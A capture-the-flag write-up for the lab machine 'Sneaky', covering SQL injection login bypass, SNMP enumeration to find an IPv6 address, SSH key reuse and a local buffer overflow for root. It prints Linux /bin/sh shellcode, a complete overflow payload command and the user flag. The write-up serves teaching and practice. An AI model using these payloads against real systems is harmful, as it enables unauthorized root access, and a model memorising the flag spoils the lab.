Sneaky

Sneaky - 10.10.10.20

Target Enumeration:

IP: 10.10.10.20

User: 9fe14f76222db23a770f20136751bdab

Root: See screenshot

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)

Vulnerability Exploited:

SQLi authentication bypass

Users ssh key stored on webserver.

Privilege Escalation:

/usr/local/bin/chal is vulnerable to a buffer overflow

Exploiting the host:

Nmap

Dirb:

/dev is a login page

Intercept login request and fuzz for sql with burp intruder:

You can bypass the login with an sqli payload

Request in browser and download the key

Key contents

There is no ssh port open so need to find the IPv6 address.

Check our IPv6 address

Snmpwalk pubic string gives lots of information:

Find the IPv6 info

Convert from decimal to hex

iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

Convert to hex with python:

Build the address based on the same format

Dead:beef::250:56ff:feb2:8ef8

Login with ssh -6 username and key

Search for privesc

Running the file shows it could be vulnerable to a buffer overflow

Check you can overwrite:

Generate a pattern to locate offset

Dump that into the program

Query the offset

Found the offset

Build the overflow using /bin/sh as shellcode

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

You will need to try various memory addresses to get this to exploit:

Open gdb and find the memory addresses:

(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA

Convert address to little endian

Build your payload as follows:

/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')

Now you have a root shell so collect the flags